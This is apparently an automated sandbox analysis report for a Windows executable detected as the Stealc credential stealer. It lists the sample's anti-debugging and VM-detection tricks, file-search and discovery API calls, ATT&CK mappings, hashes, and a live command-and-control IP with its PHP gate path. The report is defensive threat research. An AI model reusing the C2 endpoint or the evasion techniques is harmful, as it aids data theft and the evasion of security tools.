                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11918DB second address: 1191911 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F86385196E2h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push ebx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push edx 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191B96 second address: 1191B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191B9A second address: 1191C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F86385196D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx edx, cx 0x00000027 push dword ptr [ebp+124612C5h] 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F86385196D8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 add edx, dword ptr [ebp+122D3660h] 0x0000004d jbe 00007F86385196DBh 0x00000053 and dx, 9BD7h 0x00000058 push 639CE062h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C06 second address: 1191C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C0A second address: 1191C10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7028F second address: 4F702A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702A4 second address: 4F702DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F86385196E7h 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movsx ebx, ax 0x00000013 mov dx, ax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F86385196DBh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7039F second address: 4F7040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F863914EA2Ah 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov di, si 0x00000011 mov eax, 3235C579h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F863914EA34h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F863914EA2Eh 0x00000026 and cl, FFFFFFB8h 0x00000029 jmp 00007F863914EA2Bh 0x0000002e popfd 0x0000002f mov eax, 6E497FEFh 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F863914EA31h 0x0000003d rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F01933 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10CDDFD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00CB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00CADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00CAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00CB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00CAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00CB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00CABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA1160 GetSystemInfo,ExitProcess,0_2_00CA1160
                Source: file.exe, file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1367337890.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1367337890.0000000000A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhp
                Source: file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13707
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13704
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13723
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13759
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13719
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA45C0 VirtualProtect ?,00000004,00000100,000000000_2_00CA45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CB9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9750 mov eax, dword ptr fs:[00000030h]0_2_00CB9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00CB78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00CB9600
                Source: file.exe, 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: gProgram Manager
                Source: file.exeBinary or memory string: gProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00CB7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00CB7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00CB7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00CB7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37Wifile.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37//%file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpktopfile.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php0file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.37/:%file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.37/wsfile.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.37
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1520640
                                      Start date and time:2024-09-27 17:40:10 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 16s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 82
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.37file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37/e2b1563c6670f193.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLkYpONUhAR5.exeGet hashmaliciousRedLineBrowse
                                      • 185.215.113.67
                                      file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.950289815531836
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'847'808 bytes
                                      MD5:fe0680dfa4a95f3c9f5efe7b68bebdc8
                                      SHA1:e9bc2c7b21daeb95a9d77aa34afc1476648b573f
                                      SHA256:aeb0218c5ae46c5d264100339920bca9c56a8f83b0a37383dbea2e33683d35d8
                                      SHA512:7c0416ea98c918e103fded52756677d72a887e47cbde16fee5f7e447d2dec1fcff758f1ebb12add4d6439497b0899aa2b7c25e83200b806039ab188957861c7a
                                      SSDEEP:49152:kS+0TkTdhEbo+v+W3rzuEcVYobaS0aZ8iWv5i:kAkj+9H3rAVaS0vt
                                      TLSH:C98533AE1A1B107BD4D5B47003FF1E49FB8C152474E16AD28A318676CBE7AA1BF32C15
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0xa9e000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F86386BED2Ah
                                      movups xmm3, dqword ptr [eax+eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      jmp 00007F86386C0D25h
                                      add byte ptr [edi], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or al, 80h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [edx], ecx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edi], bl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
